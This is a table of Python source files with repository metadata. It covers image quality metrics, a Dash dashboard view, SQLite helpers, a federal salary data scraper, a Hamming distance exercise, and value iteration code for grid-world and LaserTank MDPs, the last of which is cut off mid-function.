blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b173291f470766a5ebc4fa4b22553f5b3016fa64 | Python | sateodoro/AI604_Team19 | /metric.py | UTF-8 | 1,109 | 2.53125 | 3 | [] | no_license | import numpy
import math
from math import log10
from skimage.measure import compare_ssim as ssim
def to_numpy_array(image):
    """Convert a normalized tensor image into a numpy array in [0, 255].

    Assumes `image` is a torch tensor normalized with mean=0.5 / std=0.5
    per channel and carries a leading batch dimension of size 1 -- TODO
    confirm against callers.
    """
    tensor = image.cpu().data.squeeze(0)
    # Undo the per-channel normalization in place: t = t * std + mean.
    for channel, ch_mean, ch_std in zip(tensor, (0.5, 0.5, 0.5), (0.5, 0.5, 0.5)):
        channel.mul_(ch_std).add_(ch_mean)
    array = tensor.numpy() * 255.0
    return array.clip(0, 255)
def get_psnr(sr_image, ground_truth):
    """Peak signal-to-noise ratio between two tensor images, in dB.

    Both inputs are converted to [0, 255] numpy arrays and an 8-pixel
    border is cropped from each channel before the MSE is computed; a
    tiny epsilon keeps the log argument finite for identical images.
    """
    predicted = to_numpy_array(sr_image)
    reference = to_numpy_array(ground_truth)
    # Ignore an 8-pixel frame around every channel.
    diff = reference[:, 8:-8, 8:-8] - predicted[:, 8:-8, 8:-8]
    mse = (diff ** 2).mean()
    return 10 * log10(255 * 255 / (mse + 1e-10))
def get_ssim(sr_image, ground_truth):
    """Mean structural similarity (SSIM) between two tensor images.

    Images are converted to [0, 255] numpy arrays, an 8-pixel border is
    cropped, and channels are moved last (H, W, C) as skimage expects.
    """
    # converting to numpy array
    sr_image = to_numpy_array(sr_image)
    ground_truth = to_numpy_array(ground_truth)
    # ssim computation.  The module imports `numpy` without an alias, so
    # use the full module name (the previous `np.transpose` raised
    # NameError at call time).
    ssim_val = ssim(numpy.transpose(ground_truth[:, 8:-8, 8:-8], (1, 2, 0)),
                    numpy.transpose(sr_image[:, 8:-8, 8:-8], (1, 2, 0)),
                    multichannel=True)
    return ssim_val
79610af390d985f1c1cbf1d5b450f9d5ef10e4e2 | Python | luiscarlosgph/dash-template | /src/whatever/views/dashboard.py | UTF-8 | 2,390 | 2.84375 | 3 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | #!/usr/bin/python
#
# @brief View classes for displaying information on the website.
# @author Luis Carlos Garcia-Peraza Herrera (luiscarlos.gph@gmail.com).
# @date 20 Jan 2020.
import dash_bootstrap_components as dbc
import dash_html_components as html
# My imports
import wat.views.base
class DashboardView(wat.views.base.BaseView):
    """View that renders the dashboard body (everything below the navbar)."""

    def __init__(self, args):
        # Arguments are currently unused.
        pass
        # TODO: Create controller as an attribute here

    def _generate_alert_toast(self, msg='This is an alert toast', show_alert=True):
        """Build a dismissable notification toast pinned to the top-right.

        `top: 66` places the toast just below the navbar.
        """
        return dbc.Toast(
            msg,
            id='positioned-toast',
            header='Message notification',
            is_open=show_alert,
            dismissable=True,
            icon='info',
            style={'position': 'fixed', 'top': 66, 'right': 10, 'width': 350},
        )

    def _generate_example_toast(self):
        """Build a small demo toast with two one-line paragraphs."""
        body = [
            html.P('Sentence 1', className='mb-0'),
            html.P('Sentence 2', className='mb-0'),
        ]
        return dbc.Toast(body, header='Window title', style={'maxWidth': '300px'})

    def generate_html(self):
        """Assemble the dashboard layout: two rows of demo toasts plus one
        floating alert toast inside a fluid container."""
        example_toast = self._generate_example_toast()

        def toast_col():
            # The same toast component instance is reused in every column.
            return dbc.Col(example_toast, width='auto', style={'padding-right': '0px'})

        return dbc.Container(fluid=True, className='mt-3', children=[
            dbc.Row([toast_col() for _ in range(5)], className='mb-3'),
            dbc.Row([toast_col() for _ in range(2)], className='mb-3'),
            self._generate_alert_toast(),
        ])
# Guard: this module only defines view classes and is not executable.
if __name__ == '__main__':
    raise RuntimeError('[ERROR] This module cannot be run like a script.')
| true |
73ed1fcc9f3c37028ee56a3c6e1fdbcc22ffe237 | Python | ankitjain87/polymath | /utils.py | UTF-8 | 2,272 | 2.921875 | 3 | [] | no_license | import os
import requests
import sqlite3
import config
def is_db_exists():
    """Return True when the configured SQLite database file exists."""
    # `os.path.isfile` already returns a bool; the previous
    # `True if ... else False` ternary was redundant.
    return os.path.isfile(config.DB_NAME)
def connect_db():
    """Open a connection to the configured SQLite database.

    Returns the connection, or None (implicitly) when opening fails --
    the error is only printed, matching this module's other helpers.
    """
    try:
        return sqlite3.connect(config.DB_NAME)
    except Exception as ex:
        print("Connection Error", ex)
def is_table_exists(table_name='category'):
    """Return True when `table_name` exists in the SQLite database.

    Returns None when the lookup itself fails (the error is printed),
    matching the error style of the other helpers in this module.
    """
    try:
        con = connect_db()
        # Parameterized query: the previous string concatenation was
        # vulnerable to SQL injection via `table_name`.
        query = "SELECT name FROM sqlite_master WHERE type='table' AND name=?;"
        rows = con.execute(query, (table_name,)).fetchall()
        return len(rows) > 0
    except Exception as ex:
        print("Error in checking if table exists.", ex)
def create_category_table():
    """Create the category table using the DDL stored in config."""
    try:
        connection = connect_db()
        connection.execute(config.CATEGORY_TABLE)
        connection.close()
    except Exception as ex:
        print("Error in Category table creation.", ex)
def drop_category_table():
    """Drop the category table using the statement stored in config."""
    try:
        connection = connect_db()
        connection.execute(config.DROP_TABLE)
        connection.close()
    except Exception as ex:
        print("Error in Drop Category table.", ex)
def insert_category_data(data):
    """Bulk-insert category rows and commit.

    `data` is a sequence of parameter tuples for config.INSERT_STMT.
    """
    try:
        connection = connect_db()
        connection.executemany(config.INSERT_STMT, data)
        connection.commit()
        connection.close()
        print("Data inserted successfully.")
    except Exception as ex:
        print("Error in inserting data in category table.", ex)
def dispatch_http_post_request(end_point, payload, headers):
    """POST `payload` to `end_point` with `headers`; return the raw response."""
    return requests.post(end_point, data=payload, headers=headers)
def get_category_data(category_id):
    """Fetch all rows for a single category id.

    Returns a list of row tuples, or None when the query fails (the
    error is printed, matching this module's other helpers).
    """
    try:
        con = connect_db()
        # Parameterized query: the previous string concatenation was
        # vulnerable to SQL injection via `category_id`.
        stmt = config.SELECT_STMT + 'where category_id=?'
        cursor = con.execute(stmt, (category_id,))
        data = cursor.fetchall()
        con.close()
        return data
    except Exception as ex:
        print('Error while getting data for a category', category_id, ex)
def get_category_children(category_id):
    """Fetch all rows whose parent is `category_id`.

    Returns a list of row tuples, or None when the query fails (the
    error is printed, matching this module's other helpers).
    """
    try:
        con = connect_db()
        # Parameterized query: the previous string concatenation was
        # vulnerable to SQL injection via `category_id`.
        stmt = config.SELECT_STMT + 'where parent_id=?'
        cursor = con.execute(stmt, (category_id,))
        data = cursor.fetchall()
        con.close()
        return data
    except Exception as ex:
        print('Error while getting children for a category', category_id, ex)
| true |
1461efc23c4ab267d1b524f341976ee1041058f2 | Python | Zhangzhuzhefu/exercism | /python/hamming/hamming.py | UTF-8 | 170 | 3.328125 | 3 | [] | no_license | def distance(strand_a, strand_b):
if len(strand_a) != len(strand_b):
raise ValueError("ValueError")
return sum([a!=b for a,b in zip(strand_a, strand_b)])
| true |
9a680721170fdd780b5169ce077e3a4041afc510 | Python | smurching/virtualitics-2 | /scrape_fed_salaries.py | UTF-8 | 4,104 | 2.6875 | 3 | [] | no_license | from jinja2 import Template
import psycopg2
import os
import time
import json
import requests
from requests.exceptions import ConnectionError
import logging
import logging.handlers
#logging.basicConfig(level=logging.DEBUG)
# Root logger level; the DEBUG line above is kept for quick switching.
logging.basicConfig(level=logging.ERROR)
# Rotating-log destination; assumes the `log/` directory exists -- TODO confirm.
LOG_FILENAME = "log/fed_salary_log.log"
# Page size: number of records requested per API call.
num_display = 20000
# NOTE(review): TABLE_NAME appears unused in this script -- verify before relying on it.
TABLE_NAME = "fed.federal_salaries"
YEAR = 2016
# Jinja2 template for the paging endpoint.  Note the URL has no {{year}}
# placeholder even though callers pass `year=` when rendering.
base_url = Template('https://www.fedsdatacenter.com/federal-pay-rates/output.php?iDisplayStart={{next_record_start}}&iDisplayLength={{num_display}}')
def setup_logger(file_log=False):
    """Optionally attach a rotating file handler to the root logger.

    When `file_log` is exactly True, records are mirrored to LOG_FILENAME
    (rotated at ~1 MB, keeping 100 backups); otherwise this is a no-op.
    """
    if file_log is not True:
        return
    root = logging.getLogger()
    handler = logging.handlers.RotatingFileHandler(
        LOG_FILENAME, maxBytes=1000000, backupCount=100)
    fmt = logging.Formatter(
        '%(asctime)s %(processName)-10s %(name)s %(levelname)-8s %(message)s')
    handler.setFormatter(fmt)
    root.addHandler(handler)
def remove_erroneous_chars(data_to_clean):
    """Parse a currency string such as '$1,234.56' into the integer 1234.

    Drops the cents (everything after the first '.') and strips commas
    and dollar signs before converting to int.
    """
    logging.debug("Data before cleaning: {}".format(data_to_clean))
    # Keep only the whole-dollar part, then strip formatting characters.
    # (The original also kept an unused `chars_to_remove` dict and an
    # extra `.replace('.', '')` that could never match after the split.)
    whole_part = data_to_clean.split('.')[0]
    cleaned_data = int(whole_part.replace(',', '').replace('$', ''))
    logging.debug("Data after cleaning: {}".format(cleaned_data))
    return cleaned_data
def clean_data(data):
    """Normalize raw salary records in place and return the same list.

    For each record: index 3 (salary) and index 4 (bonus) are parsed
    from currency strings into ints, and index 8 (year) is cast to int.
    """
    logging.debug("All the data: {}".format(data))
    for record in data:
        logging.debug("Current record: {}".format(record))
        # Grade (index 1) is left untouched.
        # TODO: More granular grade (some strings some numbers, separate)
        record[3] = remove_erroneous_chars(record[3])
        logging.debug("Salary: {}". format(record[3]))
        record[4] = remove_erroneous_chars(record[4])
        logging.debug("Bonus: {}". format(record[4]))
        record[8] = int(record[8])
        logging.debug("Year: {}". format(record[8]))
    return data
def get_max_display_record():
    """Query the API once to learn the total number of available records.

    Returns the 'iTotalDisplayRecords' value reported by the endpoint.
    """
    # Start at record 0; only the reported total matters here.
    url = base_url.render(next_record_start=0, num_display=num_display,
                          year=YEAR)
    # `print url` was Python 2 statement syntax; the function form prints
    # the same text and also runs under Python 3.
    print(url)
    headers = {'user-agent': 'python personal project app/0.0.1'}
    response = requests.get(url, headers=headers)
    print(response.text)
    payload = json.loads(response.text)
    return payload['iTotalDisplayRecords']
def get_paged_table_data(next_iter):
    """Fetch one page of records starting at offset `next_iter`.

    On a connection error, logs it, sleeps five minutes, and retries
    once.  Returns the 'aaData' list from the JSON response.
    """
    url = base_url.render(next_record_start=next_iter,
                          num_display=num_display, year=YEAR)
    print(url)  # Python 3 compatible (was a Python 2 `print url` statement)
    try:
        response = requests.get(url)
    except ConnectionError as e:
        logging.error(e)
        time.sleep(300)
        logging.error("Trying connecting again after sleep")
        response = requests.get(url)
    print(response.text)
    return json.loads(response.text)['aaData']
import csv
# NOTE(review): this handle is opened in append mode at import time and is
# never closed; buffered rows are only flushed when the interpreter exits.
f = open("data.csv", "a")
writer = csv.writer(f)
# `time` is already imported near the top of the file; this re-import is
# harmless but redundant.
import time
def main():
    """Scrape every salary page, clean each batch, and append it to the CSV."""
    setup_logger(file_log=True)
    # Floor division: under Python 3 the original `/` would produce a
    # float page count; `//` matches the Python 2 integer behavior.
    paging_count = int(get_max_display_record()) // num_display
    next_iter = 0
    while paging_count > 0:
        start = time.time()
        logging.info("Start processing data with paging count '{}'".format(paging_count))
        raw_data = get_paged_table_data(next_iter)
        logging.info("Paged records successfully pulled")
        cleaned_data = clean_data(raw_data)
        logging.info("Data cleaned!")
        writer.writerows(cleaned_data)
        next_iter += num_display
        # Python 3 compatible print (was a Python 2 `print` statement).
        print("Next iteration start number: {}".format(next_iter))
        paging_count -= 1
        # TODO: Add retry
        time.sleep(1)  # throttle requests to the server
        end = time.time()
        print(end - start)
# Script entry point.
if __name__ == "__main__":
    main()
| true |
2c54bdd73366cef05e908225230c306f2d287453 | Python | ShuoyuanZhang418/Atificial-Intelligence | /Project-3-LaserTank MDP/GridWorld_VI.py | UTF-8 | 34,360 | 2.984375 | 3 | [] | no_license | import copy
import numpy as np
import random
import time
# Directions
from laser_tank import LaserTankMap
# Integer encodings for the four headings/actions used throughout this module.
UP = 0
DOWN = 1
LEFT = 2
RIGHT = 3
def get_action_name(action):
    """Map an action code to its single-letter display name.

    Returns None for unrecognized codes, like the original fall-through.
    """
    names = {UP: "U", DOWN: "D", LEFT: "L", RIGHT: "R"}
    return names.get(action)
# Grid cells the agent can never occupy.
OBSTACLES = [(1, 1)]
# Sentinel absorbing state entered after leaving a reward cell.
EXIT_STATE = (-1, -1)
class Grid:
    """4x3 stochastic grid world with obstacles and absorbing reward cells."""

    def __init__(self):
        self.x_size = 4
        self.y_size = 3
        self.p = 0.8  # probability the chosen action executes as intended
        self.actions = [UP, DOWN, LEFT, RIGHT]
        self.rewards = {(3, 1): -100, (3, 2): 1}
        self.discount = 0.9
        # Every (x, y) cell except obstacles, plus the absorbing exit state.
        self.states = [(x, y)
                       for x in range(self.x_size)
                       for y in range(self.y_size)
                       if (x, y) not in OBSTACLES]
        self.states.append(EXIT_STATE)

    def attempt_move(self, s, a):
        """Deterministic effect of applying action `a` from state `s`.

        Reward cells transition to the absorbing exit state; moves off
        the board or into an obstacle leave the agent in place.
        """
        # Absorbing states first.
        if s in self.rewards:
            return EXIT_STATE
        if s == EXIT_STATE:
            return s
        x, y = s[0], s[1]
        candidate = s
        # Only one branch can match a single action value.
        if a == LEFT and x > 0:
            candidate = (x - 1, y)
        elif a == RIGHT and x < self.x_size - 1:
            candidate = (x + 1, y)
        elif a == UP and y < self.y_size - 1:
            candidate = (x, y + 1)
        elif a == DOWN and y > 0:
            candidate = (x, y - 1)
        # Moving into an obstacle keeps the agent where it was.
        return s if candidate in OBSTACLES else candidate

    def stoch_action(self, a):
        """Distribution over actually-executed actions for intended `a`.

        The intended action succeeds with probability p; otherwise one of
        the two perpendicular actions occurs, each with probability (1-p)/2.
        """
        slip = (1 - self.p) / 2
        if a == RIGHT:
            dist = {RIGHT: self.p, UP: slip, DOWN: slip}
        if a == UP:
            dist = {UP: self.p, LEFT: slip, RIGHT: slip}
        if a == LEFT:
            dist = {LEFT: self.p, UP: slip, DOWN: slip}
        if a == DOWN:
            dist = {DOWN: self.p, LEFT: slip, RIGHT: slip}
        return dist

    def get_reward(self, s):
        """Reward associated with state `s` (0 for non-reward cells and exit)."""
        if s == EXIT_STATE:
            return 0
        return self.rewards.get(s, 0)
class ValueIteration:
    """Synchronous value iteration over a Grid instance."""

    def __init__(self, grid):
        # NOTE: the passed-in `grid` is ignored and a fresh Grid is built,
        # mirroring the original behavior.
        self.grid = Grid()
        self.values = {state: 0 for state in self.grid.states}

    def next_iteration(self):
        """Perform one Bellman backup for every state."""
        updated = dict()
        for state in self.grid.states:
            best = None
            for action in self.grid.actions:
                expected = 0
                for executed, prob in self.grid.stoch_action(action).items():
                    # Apply the (possibly slipped) action.
                    nxt = self.grid.attempt_move(state, executed)
                    expected += prob * (self.grid.get_reward(state)
                                        + (self.grid.discount * self.values[nxt]))
                if best is None or expected > best:
                    best = expected
            # Keep the maximum expected return over actions.
            updated[state] = best
        self.values = updated

    def print_values(self):
        """Print each state with its current value estimate."""
        for state, value in self.values.items():
            print(state, value)
def run_value_iteration():
    """Run 100 sweeps of value iteration on the grid world, printing the
    value table after every sweep and the total wall-clock time."""
    # Bug fix: `Grid` (the class object) was passed instead of an instance.
    # ValueIteration currently ignores the argument and builds its own
    # Grid, so results are unchanged, but the call site now matches the
    # intended interface.
    grid = Grid()
    vi = ValueIteration(grid)

    start = time.time()

    print("Initial values:")
    vi.print_values()
    print()

    max_iter = 100
    for i in range(max_iter):
        vi.next_iteration()
        print("Values after iteration", i + 1)
        vi.print_values()
        print()

    end = time.time()
    # (typo fixed: "copmlete" -> "complete")
    print("Time to complete", max_iter, "VI iterations")
    print(end - start)
def transition_vi_pi(self, game_map, move):
    """Expected one-step return of applying `move` from the state encoded
    in `game_map` (player position and heading), using the current value
    table `self.values`.

    For MOVE_FORWARD the intended destination occurs with probability
    t_success_prob, and each of five "error" outcomes (forward-left,
    forward-right, left, right, stay -- gathered in next_wrong_ys /
    next_wrong_xs) with probability t_error_prob * 1/5.  Any outcome that
    would leave the playable area contributes collision_cost plus the
    current state's value instead.  TURN_LEFT / TURN_RIGHT rotate the
    heading deterministically (note: they mutate game_map.player_heading
    in place -- confirm callers expect that side effect).

    Returns action_reward + gamma * action_value: expected immediate
    reward plus the discounted expected next-state value.

    NOTE(review): self.values is indexed as [x - 1][y - 1][heading], so
    the table appears to exclude the map's outer border -- verify against
    how self.values is constructed.
    """
    action_reward = 0
    action_value = 0
    # Coordinates of the in-bounds unintended ("error") destination cells.
    next_wrong_ys = []
    next_wrong_xs = []
    if move == LaserTankMap.MOVE_FORWARD:
        # get coordinates for next cell
        if game_map.player_heading == LaserTankMap.UP:
            next_y = game_map.player_y - 1
            next_x = game_map.player_x
            # Intended destination (probability t_success_prob).
            if next_y < 1:
                action_reward += game_map.collision_cost * game_map.t_success_prob
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_success_prob
            else:
                this_action_reward, this_action_value = self.get_reward_value(
                    game_map, next_y, next_x, game_map.player_heading)
                action_reward += this_action_reward * game_map.t_success_prob
                action_value += this_action_value * game_map.t_success_prob
            # Error outcome 1: forward-left diagonal (y-1, x-1).
            if game_map.player_y - 1 < 1 or game_map.player_x - 1 < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y - 1)
                next_wrong_xs.append(game_map.player_x - 1)
            # Error outcome 2: forward-right diagonal (y-1, x+1).
            if game_map.player_y - 1 < 1 or game_map.player_x + 1 >= game_map.x_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y - 1)
                next_wrong_xs.append(game_map.player_x + 1)
            # Error outcome 3: sidestep left (y, x-1).
            if game_map.player_y < 1 or game_map.player_x - 1 < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y)
                next_wrong_xs.append(game_map.player_x - 1)
            # Error outcome 4: sidestep right (y, x+1).
            if game_map.player_y < 1 or game_map.player_x + 1 >= game_map.x_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y)
                next_wrong_xs.append(game_map.player_x + 1)
            # Error outcome 5: stay in place (y, x).
            if game_map.player_y < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y)
                next_wrong_xs.append(game_map.player_x)
        elif game_map.player_heading == LaserTankMap.DOWN:
            next_y = game_map.player_y + 1
            next_x = game_map.player_x
            # Intended destination (probability t_success_prob).
            if next_y >= game_map.y_size - 1:
                action_reward += game_map.collision_cost * game_map.t_success_prob
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_success_prob
            else:
                this_action_reward, this_action_value = self.get_reward_value(
                    game_map, next_y, next_x, game_map.player_heading)
                action_reward += this_action_reward * game_map.t_success_prob
                action_value += this_action_value * game_map.t_success_prob
            # Error outcomes, mirroring the UP case for a DOWN heading.
            if game_map.player_y + 1 >= game_map.y_size - 1 or game_map.player_x - 1 < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y + 1)
                next_wrong_xs.append(game_map.player_x - 1)
            if game_map.player_y + 1 >= game_map.y_size - 1 or game_map.player_x + 1 >= game_map.x_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y + 1)
                next_wrong_xs.append(game_map.player_x + 1)
            if game_map.player_y >= game_map.y_size - 1 or game_map.player_x - 1 < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y)
                next_wrong_xs.append(game_map.player_x - 1)
            if game_map.player_y >= game_map.y_size - 1 or game_map.player_x + 1 >= game_map.x_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y)
                next_wrong_xs.append(game_map.player_x + 1)
            if game_map.player_y >= game_map.y_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y)
                next_wrong_xs.append(game_map.player_x)
        elif game_map.player_heading == LaserTankMap.LEFT:
            next_y = game_map.player_y
            next_x = game_map.player_x - 1
            # Intended destination (probability t_success_prob).
            if next_x < 1:
                action_reward += game_map.collision_cost * game_map.t_success_prob
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_success_prob
            else:
                this_action_reward, this_action_value = self.get_reward_value(
                    game_map, next_y, next_x, game_map.player_heading)
                action_reward += this_action_reward * game_map.t_success_prob
                action_value += this_action_value * game_map.t_success_prob
            # Error outcomes for a LEFT heading.
            if game_map.player_x - 1 < 1 or game_map.player_y - 1 < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y - 1)
                next_wrong_xs.append(game_map.player_x - 1)
            if game_map.player_x - 1 < 1 or game_map.player_y + 1 >= game_map.y_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y + 1)
                next_wrong_xs.append(game_map.player_x - 1)
            if game_map.player_x < 1 or game_map.player_y - 1 < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y - 1)
                next_wrong_xs.append(game_map.player_x)
            if game_map.player_x < 1 or game_map.player_y + 1 >= game_map.y_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y + 1)
                next_wrong_xs.append(game_map.player_x)
            if game_map.player_x < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y)
                next_wrong_xs.append(game_map.player_x)
        else:
            next_y = game_map.player_y
            next_x = game_map.player_x + 1
            # Intended destination (probability t_success_prob).
            if next_x >= game_map.x_size - 1:
                action_reward += game_map.collision_cost * game_map.t_success_prob
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_success_prob
            else:
                this_action_reward, this_action_value = self.get_reward_value(
                    game_map, next_y, next_x, game_map.player_heading)
                action_reward += this_action_reward * game_map.t_success_prob
                action_value += this_action_value * game_map.t_success_prob
            # Error outcomes for a RIGHT heading (bounds tested via next_x).
            if next_x + 1 >= game_map.x_size - 1 or game_map.player_y - 1 < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y - 1)
                next_wrong_xs.append(game_map.player_x + 1)
            if next_x + 1 >= game_map.x_size - 1 or game_map.player_y + 1 >= game_map.y_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y + 1)
                next_wrong_xs.append(game_map.player_x + 1)
            if next_x >= game_map.x_size - 1 or game_map.player_y - 1 < 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y - 1)
                next_wrong_xs.append(game_map.player_x)
            if next_x >= game_map.x_size - 1 or game_map.player_y + 1 >= game_map.y_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y + 1)
                next_wrong_xs.append(game_map.player_x)
            if next_x >= game_map.x_size - 1:
                action_reward += game_map.collision_cost * game_map.t_error_prob * (1 / 5)
                action_value += self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading] * game_map.t_error_prob * (1 / 5)
            else:
                next_wrong_ys.append(game_map.player_y)
                next_wrong_xs.append(game_map.player_x)
        # Accumulate the expected return over the in-bounds error cells.
        for i in range(len(next_wrong_ys)):
            this_action_reward, this_action_value = self.get_reward_value(
                game_map, next_wrong_ys[i], next_wrong_xs[i],
                game_map.player_heading)
            action_reward += this_action_reward * game_map.t_error_prob * (1 / 5)
            action_value += this_action_value * game_map.t_error_prob * (1 / 5)
    elif move == LaserTankMap.TURN_LEFT:
        # no collision or game over possible
        if game_map.player_heading == LaserTankMap.UP:
            game_map.player_heading = LaserTankMap.LEFT
        elif game_map.player_heading == LaserTankMap.DOWN:
            game_map.player_heading = LaserTankMap.RIGHT
        elif game_map.player_heading == LaserTankMap.LEFT:
            game_map.player_heading = LaserTankMap.DOWN
        else:
            game_map.player_heading = LaserTankMap.UP
        # Evaluate the (unchanged) cell under the rotated heading.
        if LaserTankMap.cell_is_game_over(game_map, game_map.player_y,
                                          game_map.player_x):
            action_reward = game_map.game_over_cost
            action_value = self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading]
        elif game_map.grid_data[game_map.player_y][game_map.player_x] == LaserTankMap.FLAG_SYMBOL:
            action_reward = game_map.goal_reward
            action_value = self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading]
        else:
            action_reward = game_map.move_cost
            action_value = self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading]
    elif move == LaserTankMap.TURN_RIGHT:
        # no collision or game over possible
        if game_map.player_heading == LaserTankMap.UP:
            game_map.player_heading = LaserTankMap.RIGHT
        elif game_map.player_heading == LaserTankMap.DOWN:
            game_map.player_heading = LaserTankMap.LEFT
        elif game_map.player_heading == LaserTankMap.LEFT:
            game_map.player_heading = LaserTankMap.UP
        else:
            game_map.player_heading = LaserTankMap.DOWN
        # Evaluate the (unchanged) cell under the rotated heading.
        if LaserTankMap.cell_is_game_over(game_map, game_map.player_y,
                                          game_map.player_x):
            action_reward = game_map.game_over_cost
            action_value = self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading]
        elif game_map.grid_data[game_map.player_y][game_map.player_x] == LaserTankMap.FLAG_SYMBOL:
            action_reward = game_map.goal_reward
            action_value = self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading]
        else:
            action_reward = game_map.move_cost
            action_value = self.values[game_map.player_x - 1][game_map.player_y - 1][game_map.player_heading]
    # NOTE(review): a ~110-line commented-out draft of a SHOOT_LASER branch
    # (laser propagation, movable tiles, bricks, anti-tanks, mirrors) was
    # removed from here; recover it from version control history if that
    # action is ever reintroduced.
    return action_reward + action_value * game_map.gamma
def get_reward_value(self, game_map, next_y, next_x, next_heading):
    """Immediate reward and value-table entry for entering (next_y, next_x)
    with heading `next_heading`.

    Special tiles are resolved first: an ice tile slides the position
    until the first non-ice tile (sliding into water is game over; a
    blocking tile stops the slide on the last ice cell), and a teleport
    tile jumps to its paired teleport.  Afterwards, a blocked destination
    yields collision_cost (keeping the current state's value), a
    game-over destination yields game_over_cost, a flag yields
    goal_reward, and anything else yields move_cost.

    Returns (reward, value), with value read as self.values[x-1][y-1][heading].

    NOTE(review): the ice-slide direction is taken from
    game_map.player_heading rather than `next_heading` -- confirm that is
    intentional.
    """
    # handle special tile types
    if game_map.grid_data[next_y][next_x] == LaserTankMap.ICE_SYMBOL:
